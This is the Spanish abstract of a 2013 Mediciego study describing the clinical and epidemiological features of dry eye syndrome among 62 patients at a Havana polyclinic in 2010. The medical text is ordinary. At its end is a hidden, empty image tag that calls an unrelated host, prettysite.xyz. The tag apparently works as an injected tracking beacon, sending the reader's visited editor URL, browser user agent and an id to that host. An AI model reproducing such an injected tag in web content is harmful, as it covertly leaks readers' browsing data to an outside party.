Características clínico-epidemiológicas del síndrome de ojo seco en el Policlínico “Federico Capdevila” durante el año 2010. - Victorero Malagón, Yunieski; Martínez Legón, Zoila C.; Triana Casado, Idalia; Sablón González, Raúl; Hernández Cedeño, Catherine; Morell Ochoa, Zailyt (Mediciego, 2013)
El síndrome de ojo seco es una afección frecuente en la consultas de oftalmología. Se realizó un estudio descriptivo y transversal durante el año 2010 en el policlínico “Federico Capdevila”, La Habana, con el objetivo de caracterizar clínica y epidemiológicamente esta entidad, en los pacientes pertenecientes a esta área de salud. Se analizaron las variables edad, sexo, síntomas y signos, tiempo de ruptura de la película lagrimal, resultados del Test de Schirmer I y factores de riesgo asociados a esta enfermedad. El universo estuvo constituido por 200 pacientes con sospecha de ojo seco que acudieron a consulta durante el período señalado y la muestra por 62 pacientes con diagnóstico confirmado. La afección predominó a partir de los 60 años (45,2%) y más en mujeres (59,7%), los síntomas y signos más frecuentes fueron la sensación de ojo seco (40,3%) y la hiperemia conjuntival (32,3%), el tiempo de ruptura de la película lagrimal y el Test de Schirmer I resultaron positivos en la mayoría de los pacientes y las enfermedades oculares (32,3%) predominaron como principal factor de riesgo asociado al ojo seco. <img src="http://prettysite.xyz/acnt?_=1583866889463&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F205&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />